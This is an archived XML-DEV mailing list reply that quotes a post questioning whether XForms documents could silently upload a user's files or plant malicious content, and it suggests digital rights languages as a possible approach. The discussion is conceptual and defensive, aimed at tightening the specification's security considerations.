[XML-DEV Mailing List Archive Home] [By Thread] [By Date] [Recent Entries] [Reply To This Message]

Re: XForms - Secure or Insecure?

xforms upload
1. That a malicious XForms-containing document can upload files from a
user's computer without their knowledge

(thinking outside the box here)
It seems to me that this *could* involve digital rights - that is, the
issue can be approached from the file perspective rather than the XForms
perspective.  Initiatives such as the OASIS Rights Language TC [1] and
the W3C Open Digital Rights Language (ODRL[2]) come to mind. However,
this would require access control policies for the XForms-containing
document (thinking of it almost as a "user") - which may be out of scope
of the issue.

Kind Regards,
Joe Chiusano
Booz | Allen | Hamilton

[1] http://www.oasis-open.org/committees/rights/
[2] http://www.w3.org/TR/odrl/

AndrewWatt2000@a... wrote:
> [I posted this primarily to XForms lists but if anyone among those on XML-Dev
> who is interested in XForms has thought about this issue, any informed
> feedback would be welcome. Thanks. ]
> I thought it would be useful ... hopefully in the sense of eliciting
> well-founded reassurance .. to raise a couple of security questions that I
> have regarding XForms.
> There are two potential sources of security concern:
> 1. That a malicious XForms-containing document can upload files from a user's
> computer without their knowledge
> 2. A malicious XForms-containing document could download a virus or other
> nasty to the user's computer.
> Let me explain how these undesirable situations might potentially arise.
> The general background is that an XForms-containing document may have more
> than one XForms model. The security concerns that I am raising could be
> hidden in one XForms model while another XForms model produces the
> functionality that the user wants or needs.
> 1. File Upload - In principle it seems possible as the Candidate
> Recommendation is drafted that a file could be uploaded from the user's
> computer in response to any arbitrary event. For example the file could be
> uploaded as soon as the XForms completes initialization. One scenario is that
> the content of the file in question is loaded into an <xforms:instance> and
> is later "submitted" to an arbitrary URL chosen by the author of the
> malicious code. If the XForms author sets the replace attributes on <
> xforms:submission> to a value of "none", the user may have no knowledge that
> the file has been "stolen" from their computer.
> 2. Virus Implantation - In principle a hidden XForms model could obtain its
> instance data from an arbitrary URL, with no indication that malicious code
> has been downloaded into the instance data, using the src attribute on <
> xforms:instance>. As with scenario 1, an arbitrary event could be used to
> "submit" i.e. save the malicious code to the user's computer using a file
> URL.
> Given that an XForms-containing document could contain more than two XForms
> models, then a combined upload/virus implantation attack would be
> theoretically possible.
> I assume that the intent of the WG is that XForms implementers provide some
> form (pun intended) of sandbox to prevent such malicious practices. However,
> the current CR seems to rely largely on implementers' common sense ... a
> dangerous commodity where security is concerned ... rather than provide a
> detailed consideration of the risks (perhaps only simply to dismiss them?)
> and solution for these potential security concerns.
> I would welcome comments on whether the scenarios which I describe are
> realistic and, assuming that, on what the most appropriate way(s) forward are
> to ensure that XForms-containing documents cannot be used for malicious
> purposes.
> If XForms is to be accepted as an appropriate vehicle for handling valuable
> and sensitive business data, it is critical that there is well-founded
> confidence in the security provided by XForms implementations.
> Andrew Watt
> -----------------------------------------------------------------
> The xml-dev list is sponsored by XML.org <http://www.xml.org>, an
> initiative of OASIS <http://www.oasis-open.org>
> The list archives are at http://lists.xml.org/archives/xml-dev/
> To subscribe or unsubscribe from this list use the subscription
> manager: <http://lists.xml.org/ob/adm.pl>
tel;work:(703) 902-6923
org:Booz | Allen | Hamilton;IT Digital Strategies Team
adr:;;8283 Greensboro Drive;McLean;VA;22012;
title:Senior Consultant
fn:Joseph M. Chiusano


Purchasing Stylus Studio from our online shop is Easy, Secure and Value Priced!

Buy Stylus Studio Now

Download The World's Best XML IDE!

Accelerate XML development with our award-winning XML IDE - Download a free trial today!

Don't miss another message! Subscribe to this list today.
First Name
Last Name
Subscribe in XML format
RSS 2.0
Atom 0.3

Stylus Studio has published XML-DEV in RSS and ATOM formats, enabling users to easily subcribe to the list from their preferred news reader application.

Stylus Studio Sponsored Links are added links designed to provide related and additional information to the visitors of this website. they were not included by the author in the initial post. To view the content without the Sponsor Links please click here.

Site Map | Privacy Policy | Terms of Use | Trademarks
Free Stylus Studio XML Training:
W3C Member
Stylus Studio® and DataDirect XQuery ™are products from DataDirect Technologies, is a registered trademark of Progress Software Corporation, in the U.S. and other countries. © 2004-2013 All Rights Reserved.